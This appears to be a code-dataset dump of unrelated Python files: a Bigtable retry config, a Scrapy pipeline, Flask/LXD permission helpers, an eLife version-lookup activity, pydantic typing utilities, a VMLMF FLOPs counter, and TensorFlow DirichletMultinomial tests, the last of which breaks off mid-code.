ext
stringclasses
9 values
sha
stringlengths
40
40
content
stringlengths
3
1.04M
py
1a3f59a06023580cd1bde994bfa030ba983f7c85
config = { "interfaces": { "google.bigtable.admin.v2.BigtableTableAdmin": { "retry_codes": { "idempotent": ["DEADLINE_EXCEEDED", "UNAVAILABLE"], "non_idempotent": [], }, "retry_params": { "idempotent_params": { "initial_retry_delay_millis": 1000, "retry_delay_multiplier": 2.0, "max_retry_delay_millis": 60000, "initial_rpc_timeout_millis": 60000, "rpc_timeout_multiplier": 1.0, "max_rpc_timeout_millis": 60000, "total_timeout_millis": 600000, }, "non_idempotent_params": { "initial_retry_delay_millis": 0, "retry_delay_multiplier": 1.0, "max_retry_delay_millis": 0, "initial_rpc_timeout_millis": 60000, "rpc_timeout_multiplier": 1.0, "max_rpc_timeout_millis": 60000, "total_timeout_millis": 60000, }, "non_idempotent_heavy_params": { "initial_retry_delay_millis": 0, "retry_delay_multiplier": 1.0, "max_retry_delay_millis": 0, "initial_rpc_timeout_millis": 300000, "rpc_timeout_multiplier": 1.0, "max_rpc_timeout_millis": 300000, "total_timeout_millis": 300000, }, "drop_row_range_params": { "initial_retry_delay_millis": 0, "retry_delay_multiplier": 1.0, "max_retry_delay_millis": 0, "initial_rpc_timeout_millis": 3600000, "rpc_timeout_multiplier": 1.0, "max_rpc_timeout_millis": 3600000, "total_timeout_millis": 3600000, }, }, "methods": { "CreateTable": { "timeout_millis": 130000, "retry_codes_name": "non_idempotent", "retry_params_name": "non_idempotent_heavy_params", }, "CreateTableFromSnapshot": { "timeout_millis": 60000, "retry_codes_name": "non_idempotent", "retry_params_name": "non_idempotent_params", }, "ListTables": { "timeout_millis": 60000, "retry_codes_name": "idempotent", "retry_params_name": "idempotent_params", }, "GetTable": { "timeout_millis": 60000, "retry_codes_name": "idempotent", "retry_params_name": "idempotent_params", }, "DeleteTable": { "timeout_millis": 60000, "retry_codes_name": "non_idempotent", "retry_params_name": "non_idempotent_params", }, "ModifyColumnFamilies": { "timeout_millis": 60000, "retry_codes_name": "non_idempotent", "retry_params_name": "non_idempotent_heavy_params", }, "DropRowRange": { "timeout_millis": 900000, "retry_codes_name": "non_idempotent", "retry_params_name": "drop_row_range_params", }, "GenerateConsistencyToken": { "timeout_millis": 60000, "retry_codes_name": "idempotent", "retry_params_name": "idempotent_params", }, "CheckConsistency": { "timeout_millis": 60000, "retry_codes_name": "idempotent", "retry_params_name": "idempotent_params", }, "SnapshotTable": { "timeout_millis": 60000, "retry_codes_name": "non_idempotent", "retry_params_name": "non_idempotent_params", }, "GetSnapshot": { "timeout_millis": 60000, "retry_codes_name": "idempotent", "retry_params_name": "idempotent_params", }, "ListSnapshots": { "timeout_millis": 60000, "retry_codes_name": "idempotent", "retry_params_name": "idempotent_params", }, "DeleteSnapshot": { "timeout_millis": 60000, "retry_codes_name": "non_idempotent", "retry_params_name": "non_idempotent_params", }, }, } } }
py
1a3f5bb7959fd0eac7bd782d6094cdebbbfa491e
"""contains custom scrapy pipeline.""" class IndexPipeline(object): """This class renames _index field.""" def process_item(self, item, spider): """implements https://doc.scrapy.org/en/latest/topics/item-pipeline.html#process_item""" if item.get('_index'): item['self'] = item.pop('_index') return item
py
1a3f5bb9dfa3906b20bfaf53b63f5dfc5214dfef
#!/usr/bin/env python # -*- coding: utf-8 -*- from functools import wraps from werkzeug.exceptions import Forbidden from .models import * # from flask_jwt_extended.view_decorators import _decode_jwt_from_request from flask_jwt_extended import verify_jwt_in_request, get_jwt_claims from lgw import lxd_api_get def import_user(): """ Get user identity from json web token :return: current_identity """ try: from flask_jwt_extended import get_jwt_identity current_identity = User.query.get(int(get_jwt_identity())) return current_identity except ImportError: raise ImportError( 'User argument not passed') def populate_instances_table(): """ Search for new or deleted instances and update their status in local database """ database_lxdservers_list = Server.query.all() for lxdserver in database_lxdservers_list: all = [] try: res = lxd_api_get(lxdserver, 'instances') for c in res.json()['metadata']: all.append(c[15:]) # get instance name from api url except Exception as e: print(e) current_instances_list = tuple(all) database_instances_list = Instance.query.filter_by(location=lxdserver.name) database_instances_list_names = [str(i.name) for i in database_instances_list] # Removing old instances from database for inst in database_instances_list: if not inst.name in current_instances_list: db.session.delete(inst) db.session.commit() if len(inst.servers) == 0: db.session.delete(inst) db.session.commit() # Adding new instances to database for cinst in current_instances_list: if not cinst in database_instances_list_names: instance = Instance() instance.name = cinst instance.location = lxdserver.name db.session.add(instance) db.session.commit() lxdserver.instances.append(instance.id) db.session.commit() db.session.commit() def user_has(ability, get_user=import_user): """ Takes an ability (a string name of either a role or an ability) and returns the function if the user has that ability :param ability: :param get_user: :return: wrapper: """ def wrapper(func): @wraps(func) def inner(*args, **kwargs): desired_ability = Ability.query.filter_by( name=ability).first() user_abilities = [] current_identity = get_user() for group in current_identity._groups: user_abilities += group.abilities if current_identity.admin or desired_ability.id in user_abilities: return func(*args, **kwargs) else: raise Forbidden("You do not have access") return inner return wrapper def otp_confirmed(fn): """ If you decorate a vew with this, it will ensure that the requester has a valid JWT before calling the actual view. This does check if otp is confirmed :param fn: The view function to decorate """ @wraps(fn) def wrapper(*args, **kwargs): # jwt_data = _decode_jwt_from_request(request_type='access') # print(jwt_data) verify_jwt_in_request() claims = get_jwt_claims() if claims['otp_confirmed'] == False: raise Forbidden("You do not have access") else: return fn(*args, **kwargs) return wrapper
py
1a3f5cf9398dd57b057b3a2baac9edccc09abdf9
from S3utility.s3_notification_info import S3NotificationInfo from provider.execution_context import get_session from provider.article_structure import ArticleInfo import provider.lax_provider from activity.objects import Activity lookup_functions = { "article_next_version": provider.lax_provider.article_next_version, "article_highest_version": provider.lax_provider.article_highest_version, } class activity_VersionLookup(Activity): def __init__(self, settings, logger, conn=None, token=None, activity_task=None): super(activity_VersionLookup, self).__init__( settings, logger, conn, token, activity_task ) self.name = "VersionLookup" self.pretty_name = "Version Lookup" self.version = "1" self.default_task_heartbeat_timeout = 30 self.default_task_schedule_to_close_timeout = 60 * 5 self.default_task_schedule_to_start_timeout = 30 self.default_task_start_to_close_timeout = 60 * 5 self.description = ( "Looks up version on Lax endpoints and stores version in session" ) self.logger = logger def do_activity(self, data=None): try: info = S3NotificationInfo.from_dict(data) filename = info.file_name[info.file_name.rfind("/") + 1 :] run = data["run"] session = get_session(self.settings, data, run) session.store_value("filename_last_element", filename) session.store_value("run_type", data.get("run_type")) article_structure = ArticleInfo(filename) if article_structure.article_id is None: self.logger.error( "Name '%s' did not match expected pattern for article id" % filename ) raise RuntimeError( "article_structure.article_id is None. File pattern problem." ) version = self.get_version( self.settings, article_structure, data["version_lookup_function"] ) session.store_value("version", version) article_id = str(int(article_structure.article_id)) session.store_value("article_id", article_id) self.emit_monitor_event( self.settings, article_id, version, data["run"], self.pretty_name, "start", " ".join( ("Version Lookup for article", article_id, "version:", version) ), ) self.set_monitor_property( self.settings, article_id, "article-id", article_id, "text" ) self.set_monitor_property( self.settings, article_id, "publication-status", "publication in progress", "text", version=version, ) self.emit_monitor_event( self.settings, article_structure.article_id, version, data["run"], self.pretty_name, "end", " ".join( ( "Finished Version Lookup for article", article_structure.article_id, "version:", version, ) ), ) return self.ACTIVITY_SUCCESS except Exception as exception: self.logger.exception( "Exception when trying to Lookup Version. Error: " + str(exception) ) return self.ACTIVITY_PERMANENT_FAILURE def get_version(self, settings, article_structure, lookup_function): try: version = article_structure.get_version_from_zip_filename() if version is None: return str( execute_function( lookup_functions[lookup_function], article_structure.article_id, settings, ) ) return version except Exception: self.logger.exception("Exception on function `get_version`") raise def execute_function(the_function, arg1, arg2): return the_function(arg1, arg2)
py
1a3f5e2b8f8af810eb58d382a73ae154256ac03f
""" Custom typing extension. Classes: ConstantHolder: Base class for storing constants and avoiding to hardcode everything. SaveableBaseModel: Child class of pydantic.BaseModel which enables saving and loading that BaseModel. TypedNamedTuple: Child class of SaveableBaseModel, can be used similarly to a NamedTuple and has some tensor handling utilities. ConfigClass: Base class for storing configuration fields that appear in the configuration YAML files. """ from __future__ import annotations import inspect import json from collections import Iterable, Mapping from pathlib import Path from typing import Any, Dict, List, Optional, Tuple, Union, cast import numpy as np import torch as th from pydantic import BaseModel INF = 32752 # infinity expressed in float16, this is large enough s.t. exp(-INF) == 0 TENSOR_TYPES = (th.Tensor, np.ndarray) class ConfigClass: """ Base class for config storage classes. Defines representation for printing. """ def __repr__(self) -> str: """ Represent class attributes as key, value pairs. Returns: String representation of the config. """ str_repr = ["", "-" * 10 + " " + type(self).__name__] for key, value in vars(self).items(): if key in ["config_orig"]: continue if isinstance(value, ConfigClass): # str_repr += ["-" * 10 + " " + key, str(value)] str_repr += [str(value)] else: str_repr += [f" {key} = {value}"] return "\n".join(str_repr) # ---------- SaveableBaseModel: Class for modeling and storing states. ---------- class SaveableBaseModel(BaseModel): """ Saveable version of pydantic BaseModel class. """ def save(self, file: Union[str, Path]) -> None: """ Save the model. Args: file: Target json file. """ try: json.dump(self.dict(), Path(file).open("wt", encoding="utf8")) except TypeError as e: # something in the object is probably not JSON serializable. print("---------- JSON encoding error! ----------") for key, val in self.dict().items(): print(f"{key}: {type(val)}") raise TypeError(f"See console output. JSON save to {file} failed.") from e def load(self, file: Union[str, Path]) -> SaveableBaseModel: """ Load model values from file. Args: file: Source json file. Returns: Class instance with values set from the file. """ for key, val in json.load(Path(file).open("rt", encoding="utf8")).items(): self.__setattr__(key, val) return self @classmethod def create_from_file(cls, file: Union[str, Path]) -> SaveableBaseModel: """ Instantiate model from file. Args: file: Source json file. Returns: Class instance with values set from the file. """ return cls(**json.load(Path(file).open("rt", encoding="utf8"))) class Config: # configure pydantic.BaseModel to fail on assigning wrongly typed values validate_assignment = True # ---------- TypedNamedTuple: Class for explicit data modeling. ---------- def _nested_shape_check(field_name: str, tensor_container: Any, shape: [List[Optional[int]]]) -> None: """ Check if input tensor matches the given shape. If input is iterable or mapping, recurse into it and check if all contained tensors match the given shape. Args: field_name: Used to give a more verbose error. tensor_container: Input tensor or container of tensors. shape: Target shape to check. Raises: AssertionError (wrong shape), TypeError (wrong input type) """ if isinstance(tensor_container, TENSOR_TYPES): value_shape = tensor_container.shape err_msg = f"Shape mismatch, input {value_shape} defined {shape} on field {field_name}" # check same number of dimensions assert len(value_shape) == len(shape), err_msg # check each dimension for s1, s2 in zip(value_shape, shape): # either target shape is arbitrary (None) or it matches input shape assert s2 is None or s1 == s2, err_msg elif isinstance(tensor_container, Iterable): for tensor_subcontainer in tensor_container: _nested_shape_check(field_name, tensor_subcontainer, shape) elif isinstance(tensor_container, Mapping): for _, tensor_subcontainer in tensor_container.items(): _nested_shape_check(field_name, tensor_subcontainer, shape) else: raise TypeError(f"Tensor shape check on class {type(tensor_container)} not supported, field {field_name}.") class TypedNamedTuple(BaseModel): """ Behaves similar to NamedTuple. Includes type and shape validation. Notes: Implementation of pydantic BaseModel that can be instantiated with args instead of kwargs Define class field _shape_dict to check shapes. Args: *args: Values for the model with same order as defined. Examples: >>> class ExampleTuple(TypedNamedTuple): >>> key: str >>> data: th.Tensor >>> # shape check: first dimension arbitrary, second must match exactly >>> _shapes_dict = {"key": (None, 6)} >>> t = ExampleTuple("key", th.zeros(4, 6)) >>> t.key # access with field attribute >>> t.dict()["key"] # access like a dict >>> t.tuple()[0] # access like a tuple """ _shapes_dict: Dict[str, List[Optional[int]]] = {} def __init__(self, *args, **kwargs): assert len(args) <= len(self.__fields__), (f"Too many ({len(args)}) arguments " f"for class {self.__class__.__name__}") if len(args) > 0: # fill the kwargs dict with (name, value) entries from args for (field, _model_field), arg in zip(self.__fields__.items(), args): assert field not in kwargs, f"Duplicate argument '{field}' for class {self.__class__.__name__}." kwargs[field] = arg # instantiate the model with that dict super().__init__(**kwargs) self.validate_shapes() def __len__(self) -> int: """ Convenience function: length of the tuple Returns: Length. """ return len(self.__fields__) def tuple(self) -> Tuple[Any]: """ Access the model values as tuple. Returns: Model values as tuple. """ return tuple(self.dict().values()) def dict(self, **kwargs) -> Dict[str, Any]: # pylint: disable=useless-super-delegation """ Overwrite this function for proper type hints. Returns: Model fields and values as dict. """ return super().dict(**kwargs) def keys(self) -> List[str]: """ Get list of constant keys. Returns: Constant keys. """ return self.dict().keys() def items(self) -> List[str]: """ Get list of constant keys. Returns: Constant keys. """ return self.dict().items() def values(self) -> List[Any]: """ Return constant values. Returns: Constant values. """ return self.dict().values() def validate_shapes(self): """ Use class field _shapes_dict to check if input tensors match the target shapes. Returns: """ # loop all defined shapes for key, shape in self._shapes_dict.items(): # get the field value with defined name value = self.dict()[key] # compare to target shape _nested_shape_check(key, value, shape) def to_cuda(self, *, non_blocking: bool = True) -> None: """ Convenience function: Move all tensors in the model to cuda. Args: non_blocking: Some PyTorch internal parameter, has something to do with pin_memory in dataloader. Usually shouldn't hurt to keep it at True. """ # loop all tensors in the model for name, value in self.dict().items(): if isinstance(value, th.Tensor): # update pydantic BaseModel with setattr setattr(self, name, value.cuda(non_blocking=non_blocking)) class Config: # allow torch tensors etc. arbitrary_types_allowed = True # ---------- ConstantHolder: Container for constants ---------- class _StringRepr(type): """ Metaclass for overwriting result of str(Class). """ def __str__(cls) -> str: """ When calling str(Class), call Class._get_string_repr method. Returns: Custom class string representation. """ return cls._get_string_repr() # pylint: disable=no-value-for-parameter def _get_string_repr(cls) -> str: """ Override this to return string representation of the class. Returns: Class representation as string. """ raise NotImplementedError class ConstantHolder(metaclass=_StringRepr): """ Class to hold constants. Attributes must be uppercase. Cannot be instanced. Notes: There is some magic happening here: The properties of this base class (_keys, _values, _dict) will hold all constants including those of inherited classes. The interface will then dynamically return the correct things given the current cls.__name__. Examples: Instantiate the class and set constants as class attributes. Set allowed_types to single type or list of types for value checks. >>> class MyConstants(allowed_types=str): >>> FIELD = "value" Methods: keys: Get list of constant keys. values: Get list of constant values. items: Get list of constant key/value tuples. dict: Get dictionary of constant key/value pairs. get: Get value given key, error if not found. get_safe: Get value given key, return default if not found. check_has_key: Returns bool whether or not the key is in the class. assert_has_key: Raise error if the key is not found. check_has_value: Returns bool whether or not the value is in the class. assert_has_value: Raise error if the value is not found. Notes: Public interface: Methods keys, values, items, dict, get. Supports __getitem__ syntax (using []). This class is introduced because enum.Enum has lots of unnecessary restrictions and is clumsy to use. Public methods resemble those of a dict but return lists, not e.g. instances of dict_keys. """ # create the class properties with empty entries for the root parent _keys: Dict[str, List[str]] = {"ConstantHolder": []} _values: Dict[str, List[Any]] = {"ConstantHolder": []} _dict: Dict[str, Dict[str, Any]] = {"ConstantHolder": {}} # ---------- Public interface ---------- @classmethod def keys(cls) -> List[str]: """ Get list of constant keys. Returns: Constant keys. """ return cls._keys[cls.__name__] @classmethod def values(cls) -> List[Any]: """ Return constant values. Returns: Constant values. """ return cls._values[cls.__name__] @classmethod def dict(cls) -> Dict[str, Any]: """ Return constant key-value pairs as dict. Returns: Constant keys. """ return cls._dict[cls.__name__] @classmethod def items(cls) -> List[Tuple[str, Any]]: """ Return constant key-value pairs as list of tuples like dict items. Returns: Constant keys. """ return list(zip(cls._keys[cls.__name__], cls._values[cls.__name__])) @classmethod def get(cls, key: str) -> Any: """ Get constant value given the key. Raise error if not found. Args: key: Constant key. Returns: Constant value. """ if key not in cls.keys(): raise IndexError(f"No key: {key} in {cls}") return cast(Any, getattr(cls, key)) @classmethod def get_safe(cls, key: str, default: Optional[Any] = None) -> Optional[Any]: """ Get constant value given the key. Return default if not found. Args: key: Constant key. default: Value to return if key is not found, default None. Returns: Constant value or default. """ if key not in cls.keys(): return default return cls.get(key) @classmethod def check_has_key(cls, key: str) -> bool: """ Check if the key is in the class. Args: key: Constant key. Returns: Whether or not the key is defined in the class. """ return key in cls.keys() @classmethod def assert_has_key(cls, key: str) -> None: """ Throw error if the key is not found in the class. Args: key: Constant key. """ assert cls.check_has_key(key), f"Key not found: {key} in {cls}" @classmethod def check_has_value(cls, value: Any) -> bool: """ Check if the value is in the class. Args: value: Constant value. Returns: Whether or not the key is defined in the class. """ return value in cls.values() @classmethod def assert_has_value(cls, value: str) -> None: """ Throw error if the value is not found in the class. Args: value: Constant value. """ assert cls.check_has_value(value), f"Value not found: {value} in {cls}" # ---------- Private setup methods ---------- @classmethod def _get_string_repr(cls) -> str: """ Return class name and content as string for better error messages. Returns: String representation. """ return f"ConstantHolder {cls.__name__}: {cls.items()}" @classmethod def __init_subclass__(cls, allowed_types: Optional[Union[type, List[type], Tuple[type, ...]]] = None) -> None: """ Setup properties for the public interface when this class is inherited. This will be called on nested inheritance as well. Args: allowed_types: Optionally specify a type or list of types that are allowed for values. By default all values are allowed. """ cls._keys[cls.__name__] = [] cls._values[cls.__name__] = [] cls._dict[cls.__name__] = {} # add parent fields for parent_cls in cls.__bases__: cls._keys[cls.__name__] += cls._keys[parent_cls.__name__] cls._values[cls.__name__] += cls._values[parent_cls.__name__] cls._dict[cls.__name__].update(cls._dict[parent_cls.__name__]) # loop attributes, check correctness and extend the parent's class properties _keys, _values, _dict. for key in cls.__dict__: # ignore non-public fields if key[0] == "_": continue # get the value of the constant value = getattr(cls, key) # ignore classmethods if inspect.ismethod(value) and value.__self__ is cls: continue # make sure all constants are uppercase assert key == key.upper(), f"Constant: {key} in class: {cls.__name__} must be uppercase." # if allowed types is specified, make sure the value types are allowed if allowed_types is not None: # isinstance errors when fed lists instead of tuple, so convert lists to tuples if isinstance(allowed_types, list): allowed_types = tuple(allowed_types) assert isinstance(value, allowed_types), ( f"Constant: {key} in class: {cls.__name__} must be of type {allowed_types}") # update class properties cls._keys[cls.__name__].append(key) cls._values[cls.__name__].append(value) cls._dict[cls.__name__][key] = value def __init__(self) -> None: """ Raise error when trying to instance a ConstantHolder class. """ raise RuntimeError(f"Do not instance this class, it's a ConstantHolder: {type(self).__name__}")
py
1a3f5e3c3e6fe43430f4f4ccb0115af9c5349604
################################################################################ # [VMLMF] Lowrank Matrix Factorization with Vector-Multiplication # Project: Starlab # # Authors: Hyojin Jeon ([email protected]), Seoul National University # U Kang ([email protected]), Seoul National University # # File: compression_cal.py # - utilities for analyze compression results of VMLMF # # Version : 1.0 # Date : Oct 14, 2021 # Main Contact: Hyojin Jeon # # This software is free of charge under research purposes. # For commercial purposes, please contact the authors. # ################################################################################ # pylint: disable=C0103, E1101, C0114, R0902,C0116, R0914, R0913, C0123, W0613, W0102,C0413, E0401,R1719 """ ==================================== :mod:`compression_cal` ==================================== .. moduleauthor:: Hyojin Jeon <[email protected]> 설명 ===== 모델의 파라미터 수와 FLOPs 수를 계산하기 위한 모듈입니다. """ import sys sys.path.append('../') def print_model_parm_nums(model): """print the number of parameters of the model :param model: model to count parameters """ modelparams=sum(p.numel() for p in model.parameters()) print(f" + Number of params:{(modelparams/1e3):.2f}K") def print_model_parm_flops(model,seq_len,args,modeltype="vmmodel"): """print FLOPs of the model :param model: model to count FLOPs :param seq_len: integer sequence length of the input data :param args: argument user decided :param modeltype: string type of the model """ if modeltype in ['vmlmf_group','vmlmf_lm']: print("Not Implemented") return batch_size=args.batch_size modeltype=args.model.lower() if modeltype != "mylstm" else "mylstm" total_ops=count_lstm(model,seq_len,batch_size,modeltype) total_ops+=count_linear(model,18) #linear의 iN_FEATURES,OUTFEATURE print(f" + Number of FLOPs: {(total_ops / 1e6):.2f}M") print(total_ops) def print_model_parm_names(model): """print the name of parameters of the model :param model: model to get parameters """ for idx,m in enumerate(model.modules()): print( idx, '->', m ) print("Model's state_dict:") for param_tensor in model.state_dict(): print(param_tensor, "\t", model.state_dict()[param_tensor].size()) def _count_lstm_cell(modeltype,input_size,hidden_size,wRank=None,uRank=None,bias=True): """count FLOPs of lstm/vmlmf cell :param modeltype: string modeltype :param input_size: integer input size of the model :param hidden_size: integer hidden layer size of the model :param wRank: input to hidden matrix rank of vmlmf :param uRank: hjdden to hidden matrix rank of vmlmf :param bias: whether the model share bias between for gates :returns: FLOPs of a cell """ total_ops=0 isvmmodel = True if modeltype != "mylstm" else False #vector-vector multiplication input_dia_ops = input_size hidden_dia_ops = hidden_size #substract vec elem if wRank is not None: input_addition = (2*wRank-1)*input_size + hidden_size if uRank is not None: hidden_addition = (2*uRank-1)*hidden_size +hidden_size input_ops=(2*input_size-1)*wRank+(2*wRank-1)*hidden_size \ if isvmmodel else (2*input_size-1)*hidden_size hidden_ops=(2*hidden_size-1)*uRank+(2*uRank-1)*hidden_size\ if isvmmodel else (2*hidden_size-1)*hidden_size state_ops=input_ops+hidden_ops + input_dia_ops + hidden_dia_ops +hidden_size*3 \ +input_addition + hidden_addition if isvmmodel else input_ops + hidden_ops + hidden_size if bias: state_ops+=hidden_size total_ops+=state_ops*4 #hadamard addition (f*c + i*g ) total_ops+=hidden_size*3 #h'=o*tanh(c') total_ops+=hidden_size return total_ops def count_lstm(model,seq_len,batch_size,modeltype): """count FLOPs of lstm/vmlmf layer :param model: model object :param seq_len: integer sequence length of the input data :param batch_size: integer batch_size of the input data :param modeltype: type of the model :returns: FLOPs of LSTM model """ if modeltype in ['vmlmf_group','vmlmf_lm']: print("Not Implemented") return None total_ops=0 total_ops+=_count_lstm_cell(modeltype,model.rnn.input_size,\ model.rnn.hidden_layer_sizes[0],model.rnn.w_rank,model.rnn.u_ranks,bias=True) for i in range(len(model.rnn.hidden_layer_sizes)-1): total_ops+=_count_lstm_cell(modeltype,model.rnn.hidden_layer_sizes[i],\ model.rnn.hidden_layer_sizes[i+1],model.rnn.w_rank,model.rnn.u_ranks,bias=True) total_ops*=seq_len total_ops*=batch_size return total_ops def count_linear(model,output_size): """count FLOPs of linear layer :param model: model object :param output_size: integer output size of the model :returns: FLOPs of linear layer """ input_size=model.rnn.hidden_layer_sizes[-1] return input_size*output_size*2
py
1a3f5eaf66c302895efb651ebec57410469f701c
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow as tf class DirichletMultinomialTest(tf.test.TestCase): def testSimpleShapes(self): with self.test_session(): alpha = np.random.rand(3) dist = tf.contrib.distributions.DirichletMultinomial(1., alpha) self.assertEqual(3, dist.event_shape().eval()) self.assertAllEqual([], dist.batch_shape().eval()) self.assertEqual(tf.TensorShape([3]), dist.get_event_shape()) self.assertEqual(tf.TensorShape([]), dist.get_batch_shape()) def testComplexShapes(self): with self.test_session(): alpha = np.random.rand(3, 2, 2) n = [[3., 2], [4, 5], [6, 7]] dist = tf.contrib.distributions.DirichletMultinomial(n, alpha) self.assertEqual(2, dist.event_shape().eval()) self.assertAllEqual([3, 2], dist.batch_shape().eval()) self.assertEqual(tf.TensorShape([2]), dist.get_event_shape()) self.assertEqual(tf.TensorShape([3, 2]), dist.get_batch_shape()) def testNproperty(self): alpha = [[1., 2, 3]] n = [[5.]] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(n, alpha) self.assertEqual([1, 1], dist.n.get_shape()) self.assertAllClose(n, dist.n.eval()) def testAlphaProperty(self): alpha = [[1., 2, 3]] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(1, alpha) self.assertEqual([1, 3], dist.alpha.get_shape()) self.assertAllClose(alpha, dist.alpha.eval()) def testPmfNandCountsAgree(self): alpha = [[1., 2, 3]] n = [[5.]] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(n, alpha) dist.pmf([2., 3, 0]).eval() dist.pmf([3., 0, 2]).eval() with self.assertRaisesOpError('Condition x >= 0.*'): dist.pmf([-1., 4, 2]).eval() with self.assertRaisesOpError('Condition x == y.*'): dist.pmf([3., 3, 0]).eval() def testPmf_non_integer_counts(self): alpha = [[1., 2, 3]] n = [[5.]] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(n, alpha) dist.pmf([2., 3, 0]).eval() dist.pmf([3., 0, 2]).eval() dist.pmf([3.0, 0, 2.0]).eval() # Both equality and integer checking fail. with self.assertRaisesOpError('Condition x == y.*'): dist.pmf([1.0, 2.5, 1.5]).eval() dist = tf.contrib.distributions.DirichletMultinomial( n, alpha, validate_args=False) dist.pmf([1., 2., 3.]).eval() # Non-integer arguments work. dist.pmf([1.0, 2.5, 1.5]).eval() def testPmfBothZeroBatches(self): # The probabilities of one vote falling into class k is the mean for class # k. with self.test_session(): # Both zero-batches. No broadcast alpha = [1., 2] counts = [1., 0] dist = tf.contrib.distributions.DirichletMultinomial(1., alpha) pmf = dist.pmf(counts) self.assertAllClose(1 / 3., pmf.eval()) self.assertEqual((), pmf.get_shape()) def testPmfBothZeroBatchesNontrivialN(self): # The probabilities of one vote falling into class k is the mean for class # k. with self.test_session(): # Both zero-batches. No broadcast alpha = [1., 2] counts = [3., 2] dist = tf.contrib.distributions.DirichletMultinomial(5., alpha) pmf = dist.pmf(counts) self.assertAllClose(1 / 7., pmf.eval()) self.assertEqual((), pmf.get_shape()) def testPmfBothZeroBatchesMultidimensionalN(self): # The probabilities of one vote falling into class k is the mean for class # k. with self.test_session(): alpha = [1., 2] counts = [3., 2] n = np.full([4, 3], 5., dtype=np.float32) dist = tf.contrib.distributions.DirichletMultinomial(n, alpha) pmf = dist.pmf(counts) self.assertAllClose([[1 / 7., 1 / 7., 1 / 7.]] * 4, pmf.eval()) self.assertEqual((4, 3), pmf.get_shape()) def testPmfAlphaStretchedInBroadcastWhenSameRank(self): # The probabilities of one vote falling into class k is the mean for class # k. with self.test_session(): alpha = [[1., 2]] counts = [[1., 0], [0., 1]] dist = tf.contrib.distributions.DirichletMultinomial([1.], alpha) pmf = dist.pmf(counts) self.assertAllClose([1 / 3., 2 / 3.], pmf.eval()) self.assertEqual((2), pmf.get_shape()) def testPmfAlphaStretchedInBroadcastWhenLowerRank(self): # The probabilities of one vote falling into class k is the mean for class # k. with self.test_session(): alpha = [1., 2] counts = [[1., 0], [0., 1]] pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts) self.assertAllClose([1 / 3., 2 / 3.], pmf.eval()) self.assertEqual((2), pmf.get_shape()) def testPmfCountsStretchedInBroadcastWhenSameRank(self): # The probabilities of one vote falling into class k is the mean for class # k. with self.test_session(): alpha = [[1., 2], [2., 3]] counts = [[1., 0]] pmf = tf.contrib.distributions.DirichletMultinomial( [1., 1.], alpha).pmf(counts) self.assertAllClose([1 / 3., 2 / 5.], pmf.eval()) self.assertEqual((2), pmf.get_shape()) def testPmfCountsStretchedInBroadcastWhenLowerRank(self): # The probabilities of one vote falling into class k is the mean for class # k. with self.test_session(): alpha = [[1., 2], [2., 3]] counts = [1., 0] pmf = tf.contrib.distributions.DirichletMultinomial(1., alpha).pmf(counts) self.assertAllClose([1 / 3., 2 / 5.], pmf.eval()) self.assertEqual((2), pmf.get_shape()) def testPmfForOneVoteIsTheMeanWithOneRecordInput(self): # The probabilities of one vote falling into class k is the mean for class # k. alpha = [1., 2, 3] with self.test_session(): for class_num in range(3): counts = np.zeros((3), dtype=np.float32) counts[class_num] = 1 dist = tf.contrib.distributions.DirichletMultinomial(1., alpha) mean = dist.mean().eval() pmf = dist.pmf(counts).eval() self.assertAllClose(mean[class_num], pmf) self.assertTupleEqual((3,), mean.shape) self.assertTupleEqual((), pmf.shape) def testMeanDoubleTwoVotes(self): # The probabilities of two votes falling into class k for # DirichletMultinomial(2, alpha) is twice as much as the probability of one # vote falling into class k for DirichletMultinomial(1, alpha) alpha = [1., 2, 3] with self.test_session(): for class_num in range(3): counts_one = np.zeros((3), dtype=np.float32) counts_one[class_num] = 1. counts_two = np.zeros((3), dtype=np.float32) counts_two[class_num] = 2 dist1 = tf.contrib.distributions.DirichletMultinomial(1., alpha) dist2 = tf.contrib.distributions.DirichletMultinomial(2., alpha) mean1 = dist1.mean().eval() mean2 = dist2.mean().eval() self.assertAllClose(mean2[class_num], 2 * mean1[class_num]) self.assertTupleEqual((3,), mean1.shape) def testVariance(self): # Shape [2] alpha = [1., 2] ns = [2., 3., 4., 5.] alpha_0 = np.sum(alpha) # Diagonal entries are of the form: # Var(X_i) = n * alpha_i / alpha_sum * (1 - alpha_i / alpha_sum) * # (alpha_sum + n) / (alpha_sum + 1) variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum) # Off diagonal entries are of the form: # Cov(X_i, X_j) = -n * alpha_i * alpha_j / (alpha_sum ** 2) * # (alpha_sum + n) / (alpha_sum + 1) covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2 # Shape [2, 2]. shared_matrix = np.array([ [variance_entry(alpha[0], alpha_0), covariance_entry(alpha[0], alpha[1], alpha_0)], [covariance_entry(alpha[1], alpha[0], alpha_0), variance_entry(alpha[1], alpha_0)]]) with self.test_session(): for n in ns: # n is shape [] and alpha is shape [2]. dist = tf.contrib.distributions.DirichletMultinomial(n, alpha) variance = dist.variance() expected_variance = n * (n + alpha_0) / (1 + alpha_0) * shared_matrix self.assertEqual((2, 2), variance.get_shape()) self.assertAllClose(expected_variance, variance.eval()) def testVariance_n_alpha_broadcast(self): alpha_v = [1., 2, 3] alpha_0 = 6. # Shape [4, 3] alpha = np.array(4 * [alpha_v], dtype=np.float32) # Shape [4, 1] ns = np.array([[2.], [3.], [4.], [5.]], dtype=np.float32) variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum) covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2 # Shape [4, 3, 3] shared_matrix = np.array(4 * [[ [variance_entry(alpha_v[0], alpha_0), covariance_entry(alpha_v[0], alpha_v[1], alpha_0), covariance_entry(alpha_v[0], alpha_v[2], alpha_0)], 